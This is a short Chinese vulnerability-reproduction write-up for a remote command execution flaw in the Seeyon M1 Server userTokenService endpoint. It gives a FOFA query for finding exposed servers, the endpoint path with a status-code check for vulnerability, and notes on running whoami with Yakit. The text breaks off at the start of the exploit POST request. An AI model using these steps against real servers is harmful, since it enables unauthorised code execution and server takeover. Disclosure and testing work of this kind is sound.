一、漏洞简介
致远M1移动协同办公管理软件,可以实现在任何时间、任何地点、任何环境都能让用户“轻松、便捷、高效”完成工作。同时,还可以实现PC端、移动端、web端,三端合一,无缝实时覆盖,实现管理无中断。致远 M1 Server userTokenService 存在远程命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个服务器系统。
二、影响版本
- 致远OA M1-server
三、资产测绘
- fofa
"M1-Server 已启动"
- 登录页面
四、漏洞复现
- 访问poc,当状态码为500时,表示存在漏洞
http://xx.xx.xx.xx/esn_mobile_pns/service/userTokenService
2. 执行whoami命令并获取回显,建议使用yakit进行利用,经测试burp会导致漏洞利用失败。
POST /esn_mobile_pns/serv